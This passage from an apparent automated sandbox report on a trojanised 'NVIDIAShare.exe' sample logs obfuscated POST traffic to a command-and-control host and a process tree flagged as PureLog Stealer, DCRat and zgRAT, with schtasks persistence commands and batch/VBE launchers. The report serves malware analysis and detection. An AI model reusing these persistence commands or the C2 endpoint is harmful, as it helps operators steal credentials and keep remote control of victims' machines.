                                                          Jan 13, 2025 13:40:57.021229029 CET1016INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:40:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SKeu3gXIji3cbwW5w57ipMDpjDL%2B126SQzBManIMcKQ1d5QBIbyzHYWxyqu3m%2B6878TUubCLfOVUoIwtnXCnDvjUgHpP5UAlKt92Owyl%2FUKmKHsUi8GeZVYxSJmxkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9015752aacab42e9-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4514&min_rtt=1702&rtt_var=6262&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=674&delivery_rate=60333&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          23192.168.2.549998104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:41:07.363792896 CET294OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:41:07.709794998 CET344OUTData Raw: 05 07 04 00 06 01 01 02 05 06 02 01 02 07 01 03 00 05 05 0b 02 05 03 0c 07 04 0f 53 04 07 01 57 0f 03 06 01 00 0c 06 50 0b 06 02 0b 07 03 06 0f 04 51 0d 08 0f 55 01 07 04 05 03 04 04 51 07 0a 02 53 0d 0e 07 55 01 08 0f 07 0e 54 0e 02 0c 56 07 0c
                                                          Data Ascii: SWPQUQSUTVPY\WPV\L}P|^~wbr\bvhkRqLvl^|sp{gzsz|ClCc^`Nju~V@Ax}nL}ba
                                                          Jan 13, 2025 13:41:07.807852030 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:41:08.036006927 CET1021INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:41:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ae7YIM97bDDZZ0c2gicRSD31Ijtk8Y08Hedyl%2Bo3%2B5l9DzX0bYx7B02CbASv%2F6qWSdYM%2FRaPd30t2W5I3wLNaFraKSj45IqZ%2B%2BV1hDIcw42TX6ZGNwnxTzdYwXo%2Fdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9015756f8ef642e9-EWR
                                                          alt-svc: h2=":443"; ma=60
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4221&min_rtt=1837&rtt_var=5458&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=69803&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:07:36:59
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe"
                                                          Imagebase:0x1000000
                                                          File size:2'356'395 bytes
                                                          MD5 hash:C9FEDA13F449C852EE9B95967BDFD3DE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2039608649.000000000715A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2039037903.000000000684E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:07:37:00
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe"
                                                          Imagebase:0x7f0000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:07:37:03
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" "
                                                          Imagebase:0x790000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:07:37:04
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:07:37:04
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe"
                                                          Imagebase:0xe70000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2079077521.0000000000E72000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 66%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:07:37:06
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f
                                                          Imagebase:0x7ff6c7e90000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:07:37:06
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZ" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff6c7e90000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:07:37:06
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff6c7e90000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:07:37:07
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat"
                                                          Imagebase:0x7ff606850000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:07:37:07
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:07:37:07
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7b5ed0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:07:37:07
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Imagebase:0x660000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 66%, ReversingLabs
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:07:37:07
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7d3db0000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:07:37:07
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Imagebase:0xb0000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:07:37:12
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat"
                                                          Imagebase:0x7ff606850000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:07:37:12
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:07:37:12
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7b5ed0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:07:37:12
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\PING.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:ping -n 10 localhost
                                                          Imagebase:0x7ff7de670000
                                                          File size:22'528 bytes
                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:07:37:12
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                                          Imagebase:0xb90000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:07:37:21
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                                          Imagebase:0x6f0000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:07:37:24
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat"
                                                          Imagebase:0x7ff606850000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:07:37:24
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:07:37:24
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7b5ed0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:25
                                                          Start time:07:37:24
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7d3db0000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:07:37:29
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                                          Imagebase:0x1b0000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:07:37:31
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat"
                                                          Imagebase:0x7ff606850000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:07:37:31
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:07:37:32
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7b5ed0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:07:37:32
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\PING.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:ping -n 10 localhost
                                                          Imagebase:0x7ff7de670000
                                                          File size:22'528 bytes
                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:07:37:41
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                                          Imagebase:0x300000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:07:37:43
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
                                                          Imagebase:0x7ff606850000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:07:37:44
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:35
                                                          Start time:07:37:44
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7b5ed0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:36
                                                          Start time:07:37:44
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7d3db0000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:37
                                                          Start time:07:37:49
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                                          Imagebase:0x160000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:07:37:51
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat"
                                                          Imagebase:0x7ff606850000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:39
                                                          Start time:07:37:51
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:40
                                                          Start time:07:37:51
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7b5ed0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:41
                                                          Start time:07:37:52
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\PING.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:ping -n 10 localhost
                                                          Imagebase:0x7ff7de670000
                                                          File size:22'528 bytes
                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:42
                                                          Start time:07:38:01
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                                          Imagebase:0xf10000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:43
                                                          Start time:07:38:04
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat"
                                                          Imagebase:0x7ff606850000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
